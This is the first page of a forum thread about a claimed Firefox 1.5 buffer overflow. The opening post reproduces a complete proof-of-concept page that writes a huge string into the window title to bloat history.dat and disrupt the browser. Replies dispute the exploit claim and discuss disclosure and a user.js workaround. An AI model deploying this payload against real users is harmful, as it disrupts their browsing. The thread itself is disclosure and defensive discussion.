FireFox 1.5 Buffer overflow exploit
34 posts
• Page 1 of 3 • 1, 2, 3
This may Ive already been reported but Im going to post it here.
<!-- Firefox 1.5 buffer overflow Basically firefox logs all kinda of URL data in it's history.dat file, this little script will set a really large topic and Firefox will then save that topic into it's history.dat.. The next time that firefox is opened, it will instantly crash due to a buffer overflow -- this will happen everytime until you manually delete the history.dat file -- which most users won't figure out. this proof of concept will only prevent someone from reopening their browser after being exploited. DoS if you will. however, code execution is possible with some modifcations. Tested with Firefox 1.5 on Windows XP SP2. ZIPLOCK <sickbeatz@gmail.com> --> <html><head><title>heh</title><script type="text/javascript"> function ex() { var buffer = ""; for (var i = 0; i < 5000; i++) { buffer += "A"; } var buffer2 = buffer; for (i = 0; i < 500; i++) { buffer2 += buffer; } document.title = buffer2; } </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME </a></body></html> I'll shift this over to Firefox Bugs for further discussion. Interesting discovery. markedmannerf you will have to register a username if you want to post in that forum.
I don't know how to do any of this stuff, I just hire the guys that do
Have you considered reading the HELP folder. Right there on your menu bar. Image by Juniper http onic.net/~daylight/ - Xmas special by Ol Grumpy this is NOT the proper way to report a security bug.
please see http://www.mozilla.org/projects/securit ... olicy.html Is this your source?
http://packetstormsecurity.org/0512-exp ... erflow.txt Hopefully they at least notified the security crew before they published this. Seeing as no update has been pushed out I assume not. How kinda of them.
And here is one of the comments from Digg: "And I can't believe you didn't see where the stack is involved. The size of whatever FF is reading is obviously BIGGER than whatever BUFFER is being used to store it, thus causing an OVERFLOW of that BUFFER." How do YOU see where the stack is involved? There is no buffer overflow and no threat of arbitrary code execution; Firefox does not crash when the script is executed, nor at startup when it reads history.dat. The script causes a very large (~10MB) string to be written to history.dat (That's just a text file, you can open it in Notepad and take a look). The algorithm Firefox uses to parse this file was presumably not intended to handle such large strings and therefore takes a long time to load the file (1 to 2 mins). It allocates a buffer on the heap of arbitrary size and begins reading the string. When it determines that the buffer is not big enough to hold the entire string it allocates a new, larger buffer, copies the old data to the new buffer, and continues reading. Repeat until you've allocated a buffer large enough to hold the entire 10MB string. Inefficient? Yes. Buffer overflow exploit? No." It's not a "security issue" as there's no known way to exploit or run malicious code, all this does is cause Firefox to load much slower. Still I think this should be fixed fast and a 1.5.1 should be available within a week to reaffirm that open source releases fixes fast. It's a PR thing. Would be good to see if the update feature works fine too!
One-line fix in user.js:
Probably a few edge cases of legitimate sites not being able to set your window title, but screw ’em. Thanks for picking up on this Elfguy and others. The OP started off in the user support forum - I figured the crew over here might have some more answers.
I don't know how to do any of this stuff, I just hire the guys that do
Have you considered reading the HELP folder. Right there on your menu bar. Image by Juniper http onic.net/~daylight/ - Xmas special by Ol Grumpy Is this fix for the same buffer overflow mentioned in this page? http://forums.mozillazine.org/viewtopic.php?t=346858
They're two different problems. Thanks, Unarmed, for the workaround -- that's a lot better than having to set my history to 0 days.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
I am unable to find the user.js file.... I tried adding to the prefs.js w/o success... Any direction? I am using XP SP2. Thanks.
34 posts
Page 1 of 3 • 1, 2, 3
Who is onlineUsers browsing this forum: No registered users and 1 guest |
![]() |